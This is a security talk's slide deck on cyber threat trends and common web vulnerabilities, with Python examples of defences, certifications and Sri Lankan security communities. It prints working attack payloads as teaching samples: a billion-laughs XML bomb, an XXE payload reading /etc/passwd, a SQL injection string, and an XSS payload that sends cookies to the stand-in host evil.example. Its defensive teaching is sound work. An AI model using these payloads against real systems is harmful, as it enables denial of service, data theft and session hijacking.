Recent Trends in Cyber Security Ayoma Wijethunga WSO2, Platform Security Team


Page 1: Recent Trends in Cyber Security

Recent Trends in Cyber Security

Ayoma Wijethunga, WSO2, Platform Security Team

Page 3: Recent Trends in Cyber Security

Agenda

Trends in Cyber Security:

[15%] Threat Statistics

[35%] Technical Overview of Top Threats

[05%] Education and Certifications

[10%] Individual Research Opportunities

[05%] Job Market

[10%] Local Communities

[20%] Q&A

Page 4: Recent Trends in Cyber Security

Threat Statistics

Page 5: Recent Trends in Cyber Security

References

Symantec - Internet Security Threat Report (VOLUME 21, APRIL 2016)

Hewlett Packard Enterprise Security Research - Cyber Risk Report 2016

Acunetix - Web Application Vulnerability Report 2016

McAfee Labs - 2016 Threats Predictions

WSO2 - Public Security Advisories

All are publicly available on the internet; a web search will find them.

Page 6: Recent Trends in Cyber Security

Cyber Security - Rapid Expansion of the Landscape

Page 7: Recent Trends in Cyber Security

Cyber Security - Rapid Expansion of the Landscape

Page 8: Recent Trends in Cyber Security

Cyber Security - Data Breaches

https://www.statista.com/statistics/273550/data-breaches-recorded-in-the-united-states-by-number-of-breaches-and-records-exposed/

Information is Beautiful: http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Breach Level Index: http://breachlevelindex.com/top-data-breaches

Page 9: Recent Trends in Cyber Security

Cyber Security - Data Breaches

https://www.statista.com/statistics/267132/total-damage-caused-by-by-cyber-crime-in-the-us/

Page 10: Recent Trends in Cyber Security

Cyber Security - Data Breaches

Source: http://breachlevelindex.com/

Page 11: Recent Trends in Cyber Security

Cyber Security - Data Breaches

Source: http://breachlevelindex.com/

Page 12: Recent Trends in Cyber Security

Cyber Security - Technical Summary

Page 13: Recent Trends in Cyber Security

Cyber Security - Technical Summary

The severity of instances in the top 10 CVEs

Page 14: Recent Trends in Cyber Security

Cyber Security - Technical Summary

Page 15: Recent Trends in Cyber Security

Cyber Security - Mobile Applications

Page 16: Recent Trends in Cyber Security

Cyber Security - Mobile Applications

Page 17: Recent Trends in Cyber Security

Technical Discussion on Application Vulnerabilities

Page 18: Recent Trends in Cyber Security

XML Entity Expansion (billion laughs attack)

Vulnerable Scenario: Application parses untrusted XML with a parser that expands entity references. The attacker does not need any output: each nesting level multiplies the expansion (nine levels of ten below give 10^9 copies of "lol", roughly 3 GB), so memory or CPU is exhausted inside the parser itself.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Page 19: Recent Trends in Cyber Security

XML External Entity Injection

Vulnerable Scenario: Application parses untrusted XML with external entities enabled and returns a portion or a derivation of the parser output, so the referenced file is reflected back to the attacker. Even with no reflected output, the SYSTEM identifier can point at an http:// URL and turn the parser into an SSRF vector.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

Solution (DocumentBuilderFactory / SAXParserFactory):

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

Disallowing the DOCTYPE declaration alone defeats both XXE and entity expansion, because without a DTD there are no entity declarations at all. The remaining settings are defence in depth for parsers that must accept a DTD.

Read more at: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
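The same hardening in Python, as an added example that is not part of the original slides and not WSO2 code: expat's StartDoctypeDeclHandler plays the role of the Java "disallow-doctype-decl" feature, and parameter-entity parsing is switched off like the two SAX features above. The two payloads are constructed, shortened versions of the ones on the slides (two entity levels instead of nine); the function and class names are my own.

```python
import xml.parsers.expat as expat

# Constructed test documents (two entity levels; the slide's payload has nine).
BILLION_LAUGHS = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE lolz [\n"
    '<!ENTITY lol "lol">\n'
    '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n'
    '<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\n'
    "]>\n"
    "<lolz>&lol2;</lolz>"
)
XXE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    "<foo>&xxe;</foo>"
)
BENIGN = '<?xml version="1.0"?><order><item qty="2">widget</item></order>'


def expansion_bytes(levels: int = 9, fanout: int = 10, leaf: bytes = b"lol") -> int:
    """Bytes a naive parser materialises for the slide's payload: fanout**levels leaves."""
    return fanout ** levels * len(leaf)


class DoctypeRejected(ValueError):
    """Untrusted XML carried a DTD (internal subset or external)."""


def _refuse_doctype(name, sysid, pubid, has_internal_subset):
    # Counterpart of the Java feature "disallow-doctype-decl": abort as soon as
    # <!DOCTYPE ...> is seen, before any entity declaration is processed. With
    # no DTD there are no entities, so neither XXE nor expansion is possible.
    raise DoctypeRejected(f"DOCTYPE '{name}' not allowed in untrusted XML")


def parse_untrusted(xml_text: str) -> dict:
    """Parse untrusted XML; returns {'root': first element name, 'text': character data}."""
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = _refuse_doctype
    # Defence in depth, mirroring the two SAX features on the slide: never read
    # external parameter entities, and leave ExternalEntityRefHandler unset so
    # external general entities (SYSTEM "file:///...") are never fetched.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    result = {"root": None, "text": ""}

    def start(tag, attrs):
        if result["root"] is None:
            result["root"] = tag

    def chars(data):
        result["text"] += data

    p.StartElementHandler = start
    p.CharacterDataHandler = chars
    p.Parse(xml_text, True)  # a handler exception aborts parsing and propagates
    return result


def is_rejected(xml_text: str) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted(xml_text)
    except DoctypeRejected:
        return True
    return False


if __name__ == "__main__":
    print("slide payload would expand to", expansion_bytes(), "bytes")
    for label, doc in (("billion laughs", BILLION_LAUGHS), ("xxe", XXE), ("benign", BENIGN)):
        print(label, "rejected" if is_rejected(doc) else parse_untrusted(doc))
```

Rejecting at the DOCTYPE is the right place to fail: the billion-laughs document never gets to declare a single entity, and the XXE document never gets to name a file, so no partial work is done before the request is refused.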

Page 20: Recent Trends in Cyber Security

Cross Site Scripting

Description: User input is rendered without proper output encoding, allowing an attacker to execute a malicious payload in the victim's browser.

<html>
<head><title><%= request.getParameter("title") %></title></head>
<body>.....</body>
</html>

Solution: Use output encoding appropriate to the context the value lands in (HTML body, attribute, JavaScript string, URL), e.g. the OWASP Java Encoder [ https://github.com/OWASP/owasp-java-encoder ].

Read more at: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
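What "proper encoding" means in practice, as an added example that is not from the original slides: the same untrusted "title" value is written into three different contexts, and each context gets its own encoder. The Python equivalents below stand in for the OWASP Java Encoder calls Encode.forHtml, Encode.forJavaScript and Encode.forUriComponent; the attacker payload and all function names are constructed for this example.

```python
import html
import json
from urllib.parse import quote

# Constructed attacker input for the slide's "title" parameter: closes <title>
# and ships the session cookie to the attacker's host.
PAYLOAD = '</title><script>location="http://evil.example/?c="+document.cookie</script>'


def render_unencoded(title: str) -> str:
    """Python equivalent of the slide's JSP: the parameter is written raw."""
    return "<html><head><title>" + title + "</title></head><body></body></html>"


def encode_for_html(value: str) -> str:
    """HTML element content and quoted attribute values: escape &, <, >, and both quotes."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Inside a JavaScript string literal: emit a quoted JSON literal and also
    escape "/" so a "</script>" inside the data cannot close the script block."""
    return json.dumps(value).replace("/", "\\/")


def encode_for_url_param(value: str) -> str:
    """A query-string value: percent-encode everything except unreserved characters,
    which also leaves nothing an HTML attribute could misinterpret."""
    return quote(value, safe="")


def render_encoded(title: str) -> str:
    """Hardened page: the same value lands in HTML text, a JS literal and a URL,
    and is encoded differently for each."""
    return (
        "<html><head><title>" + encode_for_html(title) + "</title>\n"
        "<script>var pageTitle = " + encode_for_js_string(title) + ";</script></head>\n"
        '<body><a href="/search?q=' + encode_for_url_param(title) + '">search again</a>'
        "</body></html>"
    )


def script_blocks(page: str) -> int:
    """Number of closed <script> blocks in the page."""
    return page.count("</script>")


if __name__ == "__main__":
    print(render_unencoded(PAYLOAD))
    print(render_encoded(PAYLOAD))
```

The unencoded page contains one script block, and it is the attacker's. The encoded page also contains exactly one, the page's own: the payload survives as inert text in the title, as an escaped string inside the JavaScript literal, and as a percent-encoded query value in the link.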

Page 21: Recent Trends in Cyber Security

Cross Site Request Forgery

Description: Forcing a victim's browser to perform an unintended action on a web application in which the victim is currently authenticated; the browser attaches the session cookie to the forged request automatically.

Solution: Protect every state-changing operation with an anti-CSRF token that the attacker's page cannot read (synchronizer token pattern), and never change state on GET

[ https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project ].

Read more at: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Source: http://www.slideshare.net/fykim/rest-security-with-jaxrs
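A minimal synchronizer-token implementation, as an added example that is not from the original slides and is not OWASP CSRFGuard: the token is derived from the session id with a server-side HMAC, embedded in the application's own forms, and verified in constant time on every state-changing request. The request dicts, session ids and helper names are constructed for this example.

```python
import hashlib
import hmac
import secrets

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


class CsrfGuard:
    """Synchronizer-token pattern: one token per session, checked on every
    state-changing request (hypothetical helper, not OWASP CSRFGuard)."""

    def __init__(self, server_secret: bytes):
        self._secret = server_secret

    def token_for(self, session_id: str) -> str:
        # HMAC(secret, session id): nothing extra to store server-side, and the
        # token cannot be forged without the secret. The attacker's page cannot
        # read it either, because it only ever appears inside the victim's own
        # HTML, which the same-origin policy hides from other sites.
        return hmac.new(self._secret, session_id.encode(), hashlib.sha256).hexdigest()

    def is_valid(self, session_id, presented) -> bool:
        if not session_id or not presented:
            return False
        # Constant-time comparison; never compare tokens with ==.
        return hmac.compare_digest(self.token_for(session_id), presented)


def handle(request: dict, guard: CsrfGuard):
    """Dispatch a constructed request {method, cookie_session, form}. The browser
    attaches cookie_session to a cross-site form post on its own; the form field
    is the only thing the attacker cannot supply."""
    if request["method"] in STATE_CHANGING:
        token = request.get("form", {}).get("csrf_token")
        if not guard.is_valid(request.get("cookie_session"), token):
            return 403, "CSRF token missing or invalid"
        return 200, "transfer executed"
    return 200, "read-only"


def demo() -> dict:
    """Three constructed requests: a legitimate post, a forged post with no token,
    and a forged post carrying the attacker's own (wrong-session) token."""
    guard = CsrfGuard(secrets.token_bytes(32))
    victim, attacker = "sess-victim-1234", "sess-attacker-9999"
    legit = {"method": "POST", "cookie_session": victim,
             "form": {"to": "bob", "amount": "100", "csrf_token": guard.token_for(victim)}}
    forged = {"method": "POST", "cookie_session": victim,  # cookie rides along
              "form": {"to": "mallory", "amount": "100000"}}  # but no token
    forged_own_token = {"method": "POST", "cookie_session": victim,
                        "form": {"to": "mallory", "amount": "100000",
                                 "csrf_token": guard.token_for(attacker)}}
    return {"legit": handle(legit, guard)[0],
            "forged": handle(forged, guard)[0],
            "forged_own_token": handle(forged_own_token, guard)[0]}


if __name__ == "__main__":
    print(demo())
```

Binding the token to the session id is what makes the third case fail: a token the attacker obtained from their own session is valid only for that session. A SameSite=Lax or Strict attribute on the session cookie is a useful second layer, but it does not replace the token.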

Page 22: Recent Trends in Cyber Security

Cross Frame Forgery / Clickjacking

Description: The target page is loaded in an invisible or opaque frame on top of a decoy page, so a user who believes they are clicking the decoy actually performs an action on the framed page.

Solution: Set the X-Frame-Options header properly (DENY or SAMEORIGIN), or the Content-Security-Policy frame-ancestors directive; frame-busting scripts are only a fallback for old browsers.

Read more at: https://www.owasp.org/index.php/Clickjacking

Source: http://computerexpertofindia.blogspot.com

Page 23: Recent Trends in Cyber Security

Server Side Request Forgery

Description: An attacker supplies a URL or host name that the vulnerable server fetches on their behalf. Because the request originates from inside the trust boundary, firewalls and other perimeter controls are bypassed and internal hosts and services (including cloud metadata endpoints) become reachable.

Source https://blogs.mcafee.com/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers/
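A destination check for outbound requests, as an added example that is not from the original slides: the scheme is allow-listed, the host is resolved, and the resolved address is refused if it is loopback, private, link-local or otherwise not publicly routable. The DNS answers are a constructed table so the example runs offline; the function names are my own.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS answers so the example runs offline; a real deployment uses
# the system resolver and then connects to the address it returned.
FAKE_DNS = {
    "api.example.com": "93.184.216.34",
    "intranet.corp.example": "10.0.0.5",
    "metadata.evil.example": "169.254.169.254",  # attacker's name -> cloud metadata IP
}


def resolve(host, resolver=FAKE_DNS):
    """ip_address for a literal IP (including [::1]) or a resolver answer, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    answer = resolver.get(host.lower())
    return ipaddress.ip_address(answer) if answer else None


def is_internal(ip) -> bool:
    """Anything not routable on the public internet counts as internal."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url, resolver=FAKE_DNS):
    """Return (ok, reason, ip). The caller must open the socket to the returned ip
    rather than resolving the name a second time (DNS rebinding), and must run
    this check again on every redirect hop."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    if not parts.hostname:
        return False, "no host", None
    if parts.username or parts.password:
        return False, "credentials in URL", None
    ip = resolve(parts.hostname, resolver)
    if ip is None:
        return False, f"{parts.hostname} does not resolve", None
    if is_internal(ip):
        return False, f"{parts.hostname} resolves to internal address {ip}", ip
    return True, "ok", ip


if __name__ == "__main__":
    for u in ("https://api.example.com/v1", "http://127.0.0.1/admin",
              "http://metadata.evil.example/latest/meta-data/", "file:///etc/passwd"):
        print(u, validate_outbound_url(u)[:2])
```

Checking the resolved address rather than the host name is the important part: the attacker controls what their own names resolve to, so a name-based block list is worthless. An allow list of permitted destinations is stronger still where the application can afford one.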

Page 24: Recent Trends in Cyber Security

SQL Injection

Description: Inject malicious content into input values to manipulate the SQL statements the application generates, so that they perform an unintended action.

Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("SELECT 1 FROM customers WHERE username = '" + username + "' and password = '" + password + "'");

What if "username" was 1' OR 1=1 --

SELECT 1 FROM customers WHERE username = '1' OR 1=1 --' and password = 'abc'

The password check is commented out and the WHERE clause is always true, so the query returns a row for every customer.

Tools are widely available and the risk is extremely high: SQLMap

Solution: Use parameterized queries (prepared statements) following the language-specific guidelines. Escaping special characters by hand is error-prone and only a last resort (caution!).

PreparedStatement pstmt = con.prepareStatement("SELECT 1 FROM customers WHERE username = ? and password = ?");
pstmt.setString(1, username);
pstmt.setString(2, password);
ResultSet rs = pstmt.executeQuery();
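The same two queries run against a real database engine, as an added example that is not from the original slides: the vulnerable function concatenates exactly as the Statement version above, the safe one uses placeholders as the PreparedStatement version does, and both are fed the slide's payload. The table, its rows and the function names are constructed for this example (passwords are stored in clear only to mirror the slide's query).

```python
import sqlite3

PAYLOAD = "1' OR 1=1 --"  # the slide's username value


def make_db() -> sqlite3.Connection:
    """In-memory customers table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def built_query(username: str, password: str) -> str:
    """The SQL text the vulnerable version actually sends to the engine."""
    return ("SELECT 1 FROM customers WHERE username = '" + username
            + "' and password = '" + password + "'")


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Same string concatenation as the slide's Statement.executeQuery call:
    a quote in the input becomes SQL syntax and '--' comments out the password check."""
    return conn.execute(built_query(username, password)).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so the
    payload is looked up literally as a user name and matches nobody."""
    sql = "SELECT 1 FROM customers WHERE username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(built_query(PAYLOAD, "abc"))
    print("vulnerable login:", login_vulnerable(db, PAYLOAD, "abc"))
    print("safe login:      ", login_safe(db, PAYLOAD, "abc"))
```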

Page 25: Recent Trends in Cyber Security

Improper / Inadequate Usage of HTTP Headers

All sensitive cookies should be HttpOnly and Secure (session hijacking / sensitive information leakage)

X-Frame-Options header should be properly defined (clickjacking); the Content-Security-Policy frame-ancestors directive is the modern equivalent

X-XSS-Protection header should be set to enable browser-level filtering (XSS). Caveat: the filter has since been removed from Chromium-based browsers and was never implemented by Firefox, so rely on output encoding and Content-Security-Policy instead

Access-Control-Allow-* headers should not be misused (cross-domain requests): never reflect an arbitrary Origin together with Access-Control-Allow-Credentials: true

Strict-Transport-Security should be set (man in the middle)

Public-Key-Pins should be set (man in the middle). Caveat: HPKP has since been deprecated and removed from major browsers because a wrong pin locks users out of the site; Certificate Transparency is the replacement

Content-Security-Policy / X-Content-Type-Options

Java Colombo Meetup session: "HTTP Security Headers - every Java developer must know" https://docs.google.com/presentation/d/1YT8cHetOpo9Hh2yEA_s0cL5oK7ousL0DE9N-S6ewL04/edit?usp=sharing
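A response-header audit that covers this list and the clickjacking slide above, as an added example that is not from the original slides: it takes the headers exactly as a server sent them and reports each missing or weak control. The two header sets are constructed fixtures, and the function names are my own. X-XSS-Protection and Public-Key-Pins are deliberately not checked, since browsers have dropped both.

```python
def _parse_cookie_attrs(set_cookie: str):
    """Split 'name=value; Attr; Attr=val' into (name, {attr_lowercase: value})."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for p in parts[1:]:
        key, _, val = p.partition("=")
        attrs[key.lower()] = val
    return name, attrs


def _hsts_max_age(value: str) -> int:
    for directive in value.split(";"):
        directive = directive.strip().lower()
        if directive.startswith("max-age="):
            try:
                return int(directive[len("max-age="):])
            except ValueError:
                return 0
    return 0


def audit_response_headers(headers):
    """headers: list of (name, value) pairs as sent. Returns a list of findings;
    an empty list means every check passed."""
    findings, single, set_cookies = [], {}, []
    for name, value in headers:
        if name.lower() == "set-cookie":
            set_cookies.append(value)  # may repeat, so keep every one
        else:
            single[name.lower()] = value

    for raw in set_cookies:
        cname, attrs = _parse_cookie_attrs(raw)
        if "httponly" not in attrs:
            findings.append(f"cookie {cname}: missing HttpOnly (readable by injected script)")
        if "secure" not in attrs:
            findings.append(f"cookie {cname}: missing Secure (sent over plain HTTP)")

    xfo = single.get("x-frame-options", "").strip().upper()
    csp = single.get("content-security-policy", "").lower()
    if xfo not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in csp:
        findings.append("clickjacking: set X-Frame-Options DENY/SAMEORIGIN or CSP frame-ancestors")

    if _hsts_max_age(single.get("strict-transport-security", "")) < 31536000:
        findings.append("HSTS: Strict-Transport-Security missing or max-age under one year")

    if single.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff not set")

    acao = single.get("access-control-allow-origin", "").strip()
    acac = single.get("access-control-allow-credentials", "").strip().lower()
    if acao == "*":
        findings.append("CORS: wildcard Access-Control-Allow-Origin; endpoint must serve only public data")
    elif acao and acac == "true":
        findings.append(f"CORS: credentialed access granted to {acao}; "
                        "confirm it is allow-listed, not reflected from the Origin header")
    return findings


# Constructed fixtures: a typical default response and a hardened one.
WEAK = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "JSESSIONID=3F1A9C; Path=/"),
    ("Access-Control-Allow-Origin", "*"),
]
HARDENED = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "JSESSIONID=3F1A9C; Path=/; HttpOnly; Secure"),
    ("X-Frame-Options", "DENY"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Content-Type-Options", "nosniff"),
]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_response_headers(hdrs) or "no findings")
```

Running this against every response in a dynamic scan (the kind of check the CI/CD pipeline described later in the deck can host) catches regressions the moment a new endpoint forgets a header.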

Page 26: Recent Trends in Cyber Security

Education and Certifications

Page 27: Recent Trends in Cyber Security

Cyber Security - Education and Certifications

EC-Council

EC-Council Certified Ethical Hacker

EC-Council Computer Hacking Forensic Investigator

EC-Council Licensed Penetration Tester

EC-Council Certified Secure Programmer

EC-Council Certified Security Specialist

ISC2

Certified Information Systems Security Professional

Certified Cloud Security Professional

Certified Cyber Forensics Professional

Certified Secure Software Lifecycle Professional

SANS GIAC

GPEN: GIAC Certified Penetration Tester

GWAPT: GIAC Web Application Penetration Tester

GSSP-JAVA: GIAC Secure Software Programmer - Java

Offensive Security

Offensive Security Certified Professional (100% practical exams)

Offensive Security Wireless Professional

Offensive Security Certified Expert

Offensive Security Exploitation Expert

Offensive Security Web Expert

CompTIA Security+

This is just an unordered quick summary. Not intended as brand promotion.

Page 28: Recent Trends in Cyber Security

Cyber Security - Education and Certifications

Search trend does not reflect every aspect.

OSCP is gaining popularity.

Page 29: Recent Trends in Cyber Security

Individual Research Opportunities

Page 30: Recent Trends in Cyber Security

Cyber Security - Individual Research Opportunities

https://www.facebook.com/whitehat

2,400+ valid submissions (2015)

$4.3 million cash awarded (2015)

800+ researchers around the world (2015)

https://www.google.com/about/appsecurity/reward-program/

$6 million cash awarded (2015)

Tomasz Bojarski found 70 bugs on Google in 2015

https://hackerone.com/

The Vulnerability Coordination & Bug Bounty Platform

https://bugcrowd.com/

Crowdsourced Application Security Testing

http://wso2.com/security

Get yourself listed: https://docs.wso2.com/display/Security/Acknowledgments

Page 31: Recent Trends in Cyber Security

Local Job Market

Page 32: Recent Trends in Cyber Security

Cyber Security - Local Job Market

WSO2

Platform Security Team initiated in December 2015

Dedicated team of 5 members

Trained security champion from each product team (~25)

Security checks integrated into CI/CD processes

Every commit goes through a static security analysis

Every build goes through a dynamic security analysis

Security awareness build up within internal engineering team (trainings / workshops)

Pearson Lanka (Pvt) Ltd

Looking for Application Security Engineer (26 September 2016): http://pearson.jobs/colombo-lka/c1-application-security-engineer/BECD35B8DCDC472680CD12A1551AA8B3/job/

SL CERT, TechCERT, PwC, Cryptogen Pvt Ltd, eCybersec

Every software or IT network service company will value cyber security knowledge and experience

Software Engineering + Security || Network Engineering + Security

Page 33: Recent Trends in Cyber Security

Local Communities

Page 34: Recent Trends in Cyber Security

Cyber Security - Local Communities

http://www.meetup.com/Colombo-White-Hat-Security/

https://www.facebook.com/ColomboWhiteHat

WSO2, Platform Security Team

http://www.meetup.com/colombo-security-meetup/

99X Technology

http://www.meetup.com/Colombo-Information-Technology-Security-Meetup-Group/

[start-up]

CAKE LABS

Page 35: Recent Trends in Cyber Security

Cyber Security - Colombo White Hat Security

July 28 - Meetup Launch (279 RSVPs and an unexpectedly large number of participants)

Introduction to "Colombo White Hat Security" by Tharindu Edirisinghe

“Wireless Network Security” by Ayoma Wijethunga

“White Hat News” by Milinda Wickramasinghe

Sep 29 - 2nd Meetup (Limited RSVPs - 150 RSVPs)

"Security Verification of Software" by Lt. Col. Dr. Chandana Gamage, former Head of the Department of Computer Science and Engineering and Senior Lecturer at the University of Moratuwa

"Security Considerations on Linux Package Management" by Tharindu Edirisinghe

Bimonthly meetup (without a miss!!!)

Page 36: Recent Trends in Cyber Security

Cyber Security - Colombo White Hat Security

Page 37: Recent Trends in Cyber Security

Q&A